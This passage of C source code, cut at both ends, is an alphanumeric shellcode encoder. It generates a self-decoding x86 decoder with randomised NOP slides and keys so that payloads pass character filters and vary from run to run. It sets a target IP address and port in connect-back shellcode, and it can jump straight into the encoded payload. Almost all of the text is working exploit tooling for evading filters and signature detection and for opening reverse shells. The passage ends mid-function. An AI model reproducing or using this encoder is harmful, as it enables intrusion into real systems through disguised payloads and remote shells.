            size_decoder);                            //                                                                           |   |
    offset_imul_instruction -=backward_slide_offset;  //                                                                           |   |
    size_nop_slide1         -=backward_slide_offset;  //                                                                           |   |
    size_nop_slide2         +=backward_slide_offset;  //////////////                                                               |   |
    printf("backward_slide_offset = %d\n", backward_slide_offset);//                                                               |   |
                                                                  ///////////////////////////////////                              |   |
    negative_offset_size_decoder1      = 9;                                                        //                              |   |
    negative_offset_size_decoder2      = 12;                                                       //                              |   |
    negative_offset_size_decoder3      = 15;                                                       //                              |   |
                                                                                                   //                              |   |
    offset_half_size_decoder           = 6;                                                        //                              |   |
    offset_terminating_key             = 8;                                                        //                              |   |
    offset_jne_xor1                    = 21;                                                       //                              |   |
    offset_size_decoder_min_1          = 24;                                                       //                              |   |
                                                                                                   //                              |   |
    offset_imul_key_offset1            = 14 + decoder_length_section1;                             //                              |   |
    offset_imul_key_offset2            = 17 + decoder_length_section1;                             //                              |   |
    offset_size_decoder_pls_2          = 21 + decoder_length_section1;                             //                              |   |
    offset_imul_key_offset3            = 24 + decoder_length_section1;                             //                              |   |
                                                                                                   //                              |   |
    offset_nop_slide1                   = decoder_length_section1+                                 //                              |   |
                                         decoder_length_section2;                                  //                              |   |
    offset_nop_slide2                   = decoder_length_section1+                                 //                              |   |
                                         decoder_length_section2+                                  //                              |   |
                                         size_nop_slide1+                                          //                              |   |
                                         imul_instruction_length;                                  //                              |   |
                                                                                                   //                              |   |
    offset_imul_instruction1           = offset_imul_instruction;                                  //                              |   |
    offset_imul_instruction2           = offset_imul_instruction+1;                                //                              |   |
    offset_imul_instruction3           = offset_imul_instruction+2;                                //                              |   |
    offset_imul_instruction4           = offset_imul_instruction+3;                                //                              |   |
                                                                                                   //                              |   |
                                                                                                   //                              |   |
    offset_imul_key                    = offset_imul_instruction4;                                 //                              |   |
                                                                                                   //                              |   |
    offset_jne_xor2                    = size_decoder-1;                                           //                              |   |
    jne_xor_negative_offset            = decoder_length_section3+                                  //                              |   |
                                         decoder_length_section2+                                  //                              |   |
                                         size_nop_slide2+                                          //                              |   |
                                         imul_instruction_length+                                  //                              |   |
                                         size_nop_slide1;                                          //                              |   |
                                                                                                   //                              |   |
                                                                                                   //                              |   |
    printf("size_decoder=0x%2X - %s\n",                                                            //                              |   |
        (UCHAR)size_decoder,                                                                       //////                          |   |
        is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");//                          |   |
    *(decoder+offset_imul_instruction3)                 = size_decoder+(decoder_version_1?0:2);    //////                          |   |
                                                                                                   //                              |   |
    printf("half_size_decoder=0x%2X - %s\n",                                                       //                              |   |
        (UCHAR)half_size_decoder,                                                                  //                              |   |
        is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!");               //                              |   |
    *(decoder+offset_half_size_decoder)                   = half_size_decoder;                     //                              |   |
                                                                                                   //                              |   |
    printf("offset_imul_key=0x%2X - %s\n",                                                         //                              |   |
        (UCHAR)offset_imul_key,                                                                    //                              |   |
        is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!");                 //                              |   |
    *(decoder+offset_imul_key_offset1)                    = offset_imul_key;                       //                              |   |
    *(decoder+offset_imul_key_offset2)                    = offset_imul_key;                       //                              |   |
    *(decoder+offset_imul_key_offset3)                    = offset_imul_key;                       //                              |   |
    //                                                                                             //                              |   |
    printf("size_decoder-1=0x%2X - %s\n",                                                          //                              |   |
        (UCHAR)size_decoder-1,                                                                     //                              |   |
        is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not alphanumeric!!!");                //                              |   |
    *(decoder+offset_size_decoder_min_1)                  = size_decoder-1;                        //                              |   |
                                                                                                   //                              |   |
    printf("size_decoder+2=0x%2X - %s\n",                                                          //                              |   |
        (UCHAR)size_decoder+2,                                                                     ////////                        |   |
        is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");//                        |   |
    *(decoder+offset_size_decoder_pls_2)                = size_decoder+(decoder_version_1?2:0);    ////////                        |   |
                                                                                                   //                              |   |
    *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder;                          //                              |   |
    *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder;                          //                              |   |
    *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder;                          //////////////////////////////  |   |
                                                                                                                               //  |   |
    *(decoder+offset_jne_xor1)                     = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),//  |   |
                                                                                             '\xFF',                           //  |   |
                                                                                             0);                               //  |   |
    *(decoder+offset_jne_xor2)                     = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),//  |   |
                                                                                             '\xFF',                           //  |   |
                                                                                             1);                               //  |   |
#ifdef CONNECT_BACK_SHELLCODE                                                                                                  //  |   |
    ip_address                                     = ip_str_to_dw(IP_ADDRESS);///////////////////////////////////////////////////  |   |
    if (ip_address == -1)    ///////////////////////////////////////////////////                                                   |   |
        exit(-1);            //                                                                                                    |   |
                             ///////////////////////////////////                                                                   |   |
    //set shellcode with ip address and port for connect-back //                                                                   |   |
    ///*                                                      //////////                                                           |   |
    *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS))           = ip_address;/////////////////                                           |   |
    *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER))      = my_htonl(TCP_PORT_NUMBER);//                                           |   |
    *(p_shellcode+OFFSET_TCP_PORT_NUMBER)                 = (UCHAR)2;                 //                                           |   |
#endif                                        //////////////////////////////////////////                                           |   |
    //*/                                      //                                                                                   |   |
    //set decoder with 'random' nop slides    //                                                                                   |   |
    strncpy(decoder+offset_nop_slide1,        ////////////////////////////                                                         |   |
            shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),//                                                         |   |
            size_nop_slide1);                                           //                                                         |   |
    strncpy(decoder+offset_nop_slide2,                                  //                                                         |   |
            shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),//                                                         |   |
            size_nop_slide2);              ///////////////////////////////                                                         |   |
                                           //                                                                                      |   |
    //set decoder with random initial key  ////////////////////////////////////////////                                            |   |
    *(decoder+offset_imul_key)                            = get_random_alnum_value();//                                            |   |
    printf("initial key=0x%2X - %s\n",                                               //////////////                                |   |
           (UCHAR)*(decoder+offset_imul_key),                                                    //                                |   |
           is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!"); //                                |   |
                                                                                                 //                                |   |
                                                                                     //////////////                                |   |
                                                                                     //                                            |   |
    //set decoder with 'random' dword pushes for registers we won't use              ////////////////                              |   |
    *(decoder+OFFSET_PUSH_DWORD1)                         = get_random_alnum_push_dword_opcode();  //                              |   |
    printf("push dword1=0x%2X - %s\n",                                                             //                              |   |
           (UCHAR)*(decoder+OFFSET_PUSH_DWORD1),                                                   //                              |   |
           is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");//                              |   |
    *(decoder+OFFSET_PUSH_DWORD2)                         = get_random_alnum_push_dword_opcode();  //                              |   |
    printf("push dword2=0x%2X - %s\n",                                                             //                              |   |
           (UCHAR)*(decoder+OFFSET_PUSH_DWORD2),                                                   //                              |   |
           is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");//                              |   |
    *(decoder+OFFSET_PUSH_DWORD3)                         = get_random_alnum_push_dword_opcode();  //                              |   |
    printf("push dword3=0x%2X - %s\n",                                                             //                              |   |
           (UCHAR)*(decoder+OFFSET_PUSH_DWORD3),                                                   //                              |   |
           is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");//                              |   |
    *(decoder+OFFSET_PUSH_DWORD4)                         = get_random_alnum_push_dword_opcode();  //                              |   |
    printf("push dword4=0x%2X - %s\n",                                                             //                              |   |
           (UCHAR)*(decoder+OFFSET_PUSH_DWORD4),                                                   //                              |   |
           is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");//                              |   |
                                                                                                   //                              |   |
    //bugfix: this time after srand() :)                                                           //                              |   |
    xor_al1=get_random_alnum_value();                                                              //                              |   |
    xor_al2=get_random_alnum_value();                                                              //                              |   |
    *(decoder+OFFSET_XOR_AL1_A) = xor_al1;                                                         //                              |   |
    *(decoder+OFFSET_XOR_AL1_B) = xor_al1;                                                         //                              |   |
    *(decoder+OFFSET_XOR_AL2_A) = xor_al2;                                                         //                              |   |
    *(decoder+OFFSET_XOR_AL2_B) = xor_al2;                                                         //                              |   |
                                                                                                   //                              |   |
    memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD,                                             //////                              |   |
           randomize_decoder_head(decoder, size_decoder, xor_al1, *(decoder+offset_jne_xor1)), // <---here-------------------------|---'
           SIZE_RANDOMIZED_DECODER_HEAD);                                                      //////                              |
    //set first xor1 to random alnum value (this is the first byte of the encoded data)            //                              |
    xor1                                                  = get_random_alnum_value();              //                              |
    printf("xor1=0x%2X - %s\n",                                                                    //                              |
           (UCHAR)xor1,                                                                            //                              |
           is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!");                         //                              |
                                            /////////////////////////////////////////////////////////                              |
RE_RUN:                                     //                                                                                     |
    sprintf(alnum_shellcode, "%s",decoder); //                                                                                     |
    memset(temp_buf, 0, 3);///////////////////                                                                                     |
    for(i=0; i<size; i++)  //                                                                                                      |
    {   /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////      |
        // each original byte is encoded into 3 alphanumeric bytes where first_byte*third_byte^second_byte==original_byte  //      |
        // third_byte is the next encoded original byte's first_byte                                                       //      |
        // the first byte of the terminating key is the last byte's third_byte                                             /////// |
        p_xor2_key=get_xor2_and_key_for_xor1_and_c(xor1, shellcode[i]);//get a list of second_byte and third_byte for first_byte// |
        if(!p_xor2_key)                                                                                                    /////// |
            goto RE_RUN;                                                                                                   //      |
        p_xor2_key = choose_random_node(p_xor2_key);//choose a random combination////////////////////////////////////////////      |
        key=p_xor2_key->key;                                           //                                                          |
        xor2=p_xor2_key->xor2;                                         //                                                          |
        temp_buf[0] = xor1;                                            //                                                          |
        temp_buf[1] = xor2;                                            //                                                          |
        strcat(alnum_shellcode, temp_buf); // append it to our decoder //                                                          |
        xor1=key;                                                      //                                                          |
        free_p_xor2_key(p_xor2_key); // free the list                  //                                                          |
    } //get next original_byte                                         //                                                          |
                                                                       ////////////////////////                                    |
    if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))//                                    |
    {                                                                                        //                                    |
        printf("error - terminating key found in encoded shellcode. running again to fix\n");//                                    |
        goto RE_RUN;                                                                         //                                    |
    }                                     /////////////////////////////////////////////////////                                    |
    *(UCHAR*)(alnum_shellcode+8)  = key; // set the last key of the encoded data to be the first byte of the terminating string    |
    *(UCHAR*)(alnum_shellcode+9)  = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string|
    *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string|
    *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string|
    strncat(alnum_shellcode,                                  // append the terminating string to the decoder+encoded shellcode    |
            (UCHAR*)(alnum_shellcode+offset_terminating_key), //////////////////////////////                                       |
            4);                                                                           //                                       |
                                                                                          //                                       |
    //bugfix: handle case of esp pointing to shellcode                                    //                                       |
    if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp"))                            //                                       |
    {                                                                                     //                                       |
        //    _asm{                                                                       //                                       |
        //        push esp;                                                               //                                       |
        //        pop eax;                                                                //                                       |
        //        xor al, 0x36;                                                           //                                       |
        //        xor al, 0x30;                                                           //                                       |
        //    }                                                                           //                                       |
        p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6);                          //                                       |
        memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6);                        //                                       |
        memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1);          //                                       |
        p_alnum_shellcode[0] = 'T';                                                       //                                       |
        p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax  //                                       |
        p_alnum_shellcode[2] = '4'; //       and using other xor values                   //                                       |
        p_alnum_shellcode[3] = '6'; // <-- (x+6)                                          //                                       |
        p_alnum_shellcode[4] = '4'; //                                                    //                                       |
        p_alnum_shellcode[5] = '0'; // <-- x                                              //                                       |
        p_alnum_shellcode[8] = get_push_register_instruction("eax");                      //                                       |
        p_alnum_shellcode[9] = get_push_register_instruction("eax");                      //                                       |
        size_decoder += 6;                                                                //                                       |
    }                                                                                     //                                       |
                                                                                          //                                       |
    printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder);       //                                       |
    printf("decoder length: %d\n%s\n",                                                    //                                       |
        size_decoder,                                                                     //                                       |
        p_alnum_shellcode);                                                               //                                       |
                                                                                          //                                       |
    printf("scanning alnum_shellcode for shellcode up to size bytes\n");                  //                                       |
    found_msg = scan_str_known_pattern(alnum_shellcode, shellcode, size);                 /////////                                |
    if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg);  //                                |
    else printf("shellcode not found encoded in alnum_shellcode.\n");   ///////////////////////////                                |
                                                                        //                                                         |
    if (str_is_alnum(alnum_shellcode))                                  //                                                         |
    {                                                                   //                                                         |
        printf("execute shellcode locally? (hit: y and press enter): ");//                                                         |
        if(tolower(getchar()) == 'y')                                   //                                                         |
        {                                                    /////////////                                                         |
            _asm                                             //                                                                    |
            {                                                //                                                                    |
                push p_alnum_shellcode;                ////////                                                                    |
                pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;// <------------------------------------------------------------------------'
                //jump to head of decoder              //
                jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;//
            }                              //////////////             
        }                                  //             
    }                                      //              
    else                                   //              
    {                                      ///////////////
        printf("error non-alphanumeric shellcode\n");   //
    }                       //////////////////////////////
                     /////////                             
                     //
    return 0;    //////                                       
}                //                                       
///////////////////                                          

BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str,
                             UCHAR *known_pattern,
                             UINT known_pattern_length,
                             UINT offset1,
                             UINT offset2,
                             UINT offset3)
{
    UINT offset,
         i,
         found;
        
    for (i=found=offset=0; i<known_pattern_length; i++)
    {
        while(*(alnum_str+offset))
        {
            if((UCHAR)((alnum_str[offset+offset1]*alnum_str[offset+offset2])^alnum_str[offset+offset3])==
               (UCHAR)known_pattern[i])
            {
                offset+=2;
                found++;
                break;
            }
            else if((UCHAR)((alnum_str[offset+offset1+1]*alnum_str[offset+offset2+1])^alnum_str[offset+offset3+1])==
                    (UCHAR)known_pattern[i])
            {
                offset+=3;
                found++;
                break;
            }
            else
            {
                found=0;
                i=0;
                offset++;
            }
        }
    }
    if(found == known_pattern_length)
        return 1;
    else
        return 0;
}
BOOL arg1_xor_arg2_imul_arg3(UCHAR *alnum_str,
                             UCHAR *known_pattern,
                             UINT known_pattern_length,
                             UINT offset1,
                             UINT offset2,
                             UINT offset3)
{
    UINT offset,
         i,
         found;
        
    for (i=found=offset=0; i<known_pattern_length; i++)
    {
        while(*(alnum_str+offset))
        {
            if((UCHAR)((alnum_str[offset+offset1]^alnum_str[offset+offset2])*alnum_str[offset+offset3])==
               (UCHAR)known_pattern[i])
            {
                offset+=2;
                found++;
                break;
            }
            else if((UCHAR)((alnum_str[offset+offset1+1]^alnum_str[offset+offset2+1])*alnum_str[offset+offset3+1])==
                    (UCHAR)known_pattern[i])
            {
                offset+=3;
                found++;
                break;
            }
            else
            {
                found=0;
                i=0;
                offset++;
            }
        }
    }
    if(found == known_pattern_length)
        return 1;
    else
        return 0;
}
BOOL arg1_imul_key_xor_arg2(UCHAR *alnum_str,
                             UCHAR *known_pattern,
                             UINT known_pattern_length,
                             UCHAR key,
                             UINT offset1,
                             UINT offset2)
{
    UINT offset,
         i,
         found;
        
    for (i=found=offset=0; i<known_pattern_length; i++)
    {
        while(*(alnum_str+offset))
        {
            if((UCHAR)((alnum_str[offset+offset1]*key)^alnum_str[offset+offset2])==
               (UCHAR)known_pattern[i])
            {
                offset+=2;
                found++;
                break;
            }
            else if((UCHAR)((alnum_str[offset+offset1+1]*key)^alnum_str[offset+offset2+1])==
                    (UCHAR)known_pattern[i])
            {
                offset+=3;
                found++;
                break;
            }
            else
            {
                found=0;
                i=0;
                offset++;
            }
        }
    }
    if(found == known_pattern_length)
        return 1;
    else
        return 0;
}

UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length)
{
    UCHAR *alnum = malloc(strlen(ALNUM_CHARSET)+1);
    UCHAR *temp_buf = malloc(255);
    strncpy(alnum, ALNUM_CHARSET, strlen(ALNUM_CHARSET));
    alnum[strlen(ALNUM_CHARSET)]=0;
    memset(temp_buf, 0, 255);
    //this is not for production, just a poc...
    while(*alnum) {
        if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 0, 1))
        {
            alnum--;
            strcat(temp_buf, "(buf[0]*'");
            temp_buf[strlen(temp_buf)] = *alnum;
            strcat(temp_buf, "')^buf[1]");
            return(temp_buf);
        }
    }
    alnum-=strlen(ALNUM_CHARSET);
    while(*alnum) {
        if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 1, 0))
        {
            alnum--;
            printf("key = 0x%2X ('%c')\n", *alnum, *alnum);
            return("found pattern using: (buf[1]*key)^buf[0]\n");
        }
    }
    if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 0, 1))
        return("(buf[0]*0x30)^buf[1]");
    else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 1, 0))
        return("(buf[1]*0x30)^buf[0]");
    else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 0, 1))
        return("(buf[0]*0x10)^buf[1]");
    else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 1, 0))
        return("(buf[1]*0x10)^buf[0]");
    else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2))
        return("(buf[0]*buf[1])^buf[2]");
    else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1))
        return("(buf[0]*buf[2])^buf[1]");
    else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0))
        return("(buf[1]*buf[2])^buf[0]");
    else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2))
        return("(buf[0]^buf[1])*buf[2]");
    else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1))
        return("(buf[0]^buf[2])*buf[1]");
    else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0))
        return("(buf[1]^buf[2])*buf[0]");
    else
        return "";
}

BOOL is_alnum(UCHAR c)
{
    char *alnum = ALNUM_CHARSET;
    char search_c[2] = "";
    search_c[0] = c;
    return((BOOL)strstr(alnum, search_c));
}

BOOL str_is_alnum(UCHAR *str)
{
    ULONG length;
    length = strlen(str);
    for(;length>0;length--) {
        if(
            !is_alnum(str[length-1])
        )
            return 0;
    }
    return 1;
}

UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index)
{
    int xor_complement_1, xor_complement_2;
    UCHAR two_xor_complements[3];

    for(xor_complement_1=0; xor_complement_1<MAX_BYTES; xor_complement_1++)
    {
        if (is_alnum((UCHAR)xor_complement_1))
        {
            for(xor_complement_2=0; xor_complement_2<MAX_BYTES; xor_complement_2++)
            {
                if (is_alnum((UCHAR)xor_complement_2))
                {
                    if(byte == (xor ^ xor_complement_1 ^ xor_complement_2))
                    {
                        two_xor_complements[0] = (UCHAR)xor_complement_1;
                        two_xor_complements[1] = (UCHAR)xor_complement_2;
                    }
                }
            }
        }
    }
    if(index == 0 || index == 1)
        return two_xor_complements[index];
    else
        return (UCHAR)0;
}

BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key)
{
    return (BOOL) strstr(alnum_shellcode, terminating_key);
}

DWORD ip_str_to_dw(UCHAR *str)
{
    DWORD x[4];
    int dwIpAddress;

    if (!str || MAX_IP_STR_LEN < strlen(str) || strlen(str) < MIN_IP_STR_LEN)
        return -1;
    
    sscanf(str, "%d.%d.%d.%d", &x[0],&x[1],&x[2],&x[3]);

    x[3] = x[3] > 255 ? -1 : (x[3] <<= 24);
    x[2] = x[2] > 255 ? -1 : (x[2] <<= 16);
    x[1] = x[1] > 255 ? -1 : (x[1] <<= 8);
    x[0] = x[0] > 255 ? -1 : (x[0] <<= 0);
    dwIpAddress = x[0]+x[1]+x[2]+x[3];


    return dwIpAddress;
}

DWORD my_htonl(DWORD dw_in)
{
    DWORD dw_out;

    *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0);
    *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1);
    *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2);
    *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3);

    return dw_out;
}

void free_p_xor2_key(struct xor2_key *node)
{
    struct xor2_key *temp = 0;

    if(node)
    {
        temp = node->prev;
        while(node->next)
        {
            node=node->next;
            free(node->prev);
        }
        free(node);
    }
    if(temp)
    {
        while(temp->prev)
        {
            temp=temp->prev;
            free(temp->next);
        }
        free(temp);
    }
}

struct xor2_key *choose_random_node(struct xor2_key *head)
{
    int num_nodes = 1, selected_node, i;
    struct xor2_key* tail = head;
    
    struct xor2_key* pn = NULL ;

    if (!head || !head->key)
        return 0;

    while(tail->next)
    {
        tail = tail->next;
        num_nodes++;
    }

    selected_node = rand()%num_nodes;

    for(i=0; i<selected_node; i++)
        head = head->next;

    return head;
}

struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c)
{
    struct xor2_key *p_xor2_key, *p_xor2_key_head;
    char *alnum = ALNUM_CHARSET;
    UINT    i=0,
            z=1,
            r=0,
            count=0;
    UCHAR   xor2=0,
            x=0;

    p_xor2_key_head = p_xor2_key = malloc(sizeof(xor2_key));
    p_xor2_key->prev   = 0;
    p_xor2_key->next   = 0;
    p_xor2_key->key    = 0;
    p_xor2_key->xor2   = 0;

    for(i=0; alnum[i]; i++)
    {
        for(x=0; alnum[x];x++)
        {
            xor2 = alnum[x];
            if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c)
            {
                p_xor2_key->xor2 = xor2;
                p_xor2_key->key  = alnum[i];
                p_xor2_key->next = malloc(sizeof(struct xor2_key));
                p_xor2_key->next->prev = p_xor2_key;
                p_xor2_key = p_xor2_key->next;
                p_xor2_key->key=0;
                p_xor2_key->xor2=0;
            }
        }
    }

    if(!p_xor2_key->key)
        p_xor2_key->next = 0;
    if (p_xor2_key->prev)
        p_xor2_key = p_xor2_key->prev;
    else
        return 0;
    free(p_xor2_key->next);
    p_xor2_key->next=0;
    return p_xor2_key_head;
}

UCHAR *shuffle(UCHAR str[], UINT length) //length does not include terminating null.
{
    UINT last, randomNum;
    UCHAR temporary;
    UCHAR *output = malloc(length);
    memcpy(output, str, length);
    for (last = length; last > 1; last--)
    {
       randomNum = rand( ) % last;
       temporary = output[randomNum];
       output[randomNum] = output[last-1];
       output[last-1] = temporary;
    }
    memcpy(str, output, length);
    return output;
}// taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm


UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide)
{
    UCHAR *prefix_substr,
        *substr,
        *suffix_substr,
        *output_str;
    UINT prefix_substr_len,
        suffix_substr_len;


    if(slide > substr_offset) {
        printf("you can't slide it that far back!\n");
        return 0;
    }

    output_str = malloc(str_len);
    memset(output_str, 0 , str_len);

    suffix_substr_len = str_len-substr_len-substr_offset;
    suffix_substr = malloc(suffix_substr_len);
    memset(suffix_substr, 0, suffix_substr_len);

    prefix_substr_len = substr_offset;
    prefix_substr = malloc(prefix_substr_len);
    memset(prefix_substr, 0, prefix_substr_len);
    
    substr = malloc(substr_len);
    memset(substr, 0, substr_len);

    strncpy(substr, str+substr_offset, substr_len);
    strncpy(prefix_substr, str, prefix_substr_len);
    strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len);

    strncpy(output_str, prefix_substr, prefix_substr_len-slide);
    strncpy(output_str+prefix_substr_len-slide, substr, substr_len);
    strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide);
    strncpy(output_str+prefix_substr_len-slide+substr_len+slide, str+substr_offset+substr_len, suffix_substr_len);


    free(prefix_substr);
    free(suffix_substr);
    free(substr);
    return output_str;
}

UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide)
{
    UCHAR *prefix_substr,
        *substr,
        *suffix_substr,
        *output_str;
    UINT prefix_substr_len,
        suffix_substr_len;


    if(slide > str_len-substr_len-substr_offset) {
        printf("you can't slide it that far forward!\n");
        return 0;
    }

    output_str = malloc(str_len);
    memset(output_str, 0 , str_len);

    suffix_substr_len = str_len-substr_len-substr_offset;
    suffix_substr = malloc(suffix_substr_len);
    memset(suffix_substr, 0, suffix_substr_len);

    prefix_substr_len = substr_offset;
    prefix_substr = malloc(prefix_substr_len);
    memset(prefix_substr, 0, prefix_substr_len);
    
    substr = malloc(substr_len);
    memset(substr, 0, substr_len);

    strncpy(substr, str+substr_offset, substr_len);
    strncpy(prefix_substr, str, prefix_substr_len);
    strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len);

    strncpy(output_str, prefix_substr, prefix_substr_len);
    strncpy(output_str+prefix_substr_len, suffix_substr, slide);
    strncpy(output_str+prefix_substr_len+slide, substr, substr_len);
    strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide);


    free(prefix_substr);
    free(suffix_substr);
    free(substr);
    return output_str;
}

UCHAR *get_nop_slide(UINT size, UINT slide)
{   //simple alnum nop slide generator
    UINT i, x, append_dec_eax = 0;
    UCHAR alnum_nop[][3] = {
        "AI", //inc ecx;dec ecx // (alnum_nop[0])
        "BJ", //inc edx;dec edx // (alnum_nop[1])
        "CK", //inc ebx;dec ebx // (alnum_nop[2])
        "EM", //inc ebp;dec ebp // (alnum_nop[3])
        "FN", //inc esi;dec esi // (alnum_nop[4])
        "GO", //inc edi;dec edi // (alnum_nop[5])                                [we don't care about eax value before the imul]
        "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2 [instruction as it overwrites eax with result ]
        "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2 [and we don't care about edi value at all.    ]

        "DL", //inc esp;dec esp // (alnum_nop[8]) --- [todo: need to preserve stack state] >--. //we can freely inc/dec esp for now
//      "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state] >--| //but we need to take it into account
//      "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state] >--| //once we start pushing/poping to/from
//      "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state] >--' //the stack.
//                                                                                            |
//TODO:   <-----------------------------------------------------------------------------------'
//    push eax   push eax   push eax   push ecx  push edx   
//    pop eax    push ecx   push ecx   dec esp   pop edx    
//    push ecx   pop ecx    push edx   inc esp   push ecx   
//    pop ecx    pop eax    inc esp    pop ecx   pop ecx    
//    push edx   push edx   dec esp    push eax  push eax   
//    pop edx    pop edx    pop edx    inc esp   pop eax    
//                          pop ecx    dec esp   .          
//                          pop eax    pop eax   .          
//                                     push edx  .          
//                                     pop edx   etc...     
    };
    UCHAR *nop_slide;
    nop_slide = malloc(size);
    memset(nop_slide, 0, size);
    if(size%2)
    {
        append_dec_eax = 1;
        size--;
    }
    for(i=0; i<(size/2); i++) {
        do 
            x = rand()%(sizeof(alnum_nop)/3);
        while
            ((slide==2)&&(x==6||x==7));
        strcat(nop_slide, alnum_nop[x]);
    }
    if(append_dec_eax)
    {
        strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide
    }
    return nop_slide;
}

UCHAR get_random_alnum_push_dword_opcode()
{
    UCHAR alnum_push_dword_opcode[] =
    {
        'P', //0x50 push eax
        'Q', //0x51 push ecx
        'R', //0x52 push edx
        'S', //0x53 push ebx
        'T', //0x54 push esp
        'U', //0x55 push ebp
        'V', //0x56 push esi
        'W'  //0x57 push edi
    };
    return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)];
}

UCHAR get_random_alnum_value()
{
    char alnum_values[] = ALNUM_CHARSET;
    return alnum_values[rand()%strlen(alnum_values)];
}

UCHAR get_push_register_instruction(UCHAR *reg)
{
         if (!strcmp(reg, "eax")) return 'P'; //0x50 push eax
    else if (!strcmp(reg, "ecx")) return 'Q'; //0x51 push ecx
    else if (!strcmp(reg, "edx")) return 'R'; //0x52 push edx
    else if (!strcmp(reg, "ebx")) return 'S'; //0x53 push ebx
    else if (!strcmp(reg, "esp")) return 'T'; //0x54 push esp
    else if (!strcmp(reg, "ebp")) return 'U'; //0x55 push ebp
    else if (!strcmp(reg, "esi")) return 'V'; //0x56 push esi
    else if (!strcmp(reg, "edi")) return 'W'; //0x57 push edi
    else return 0;
}

UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1)
{
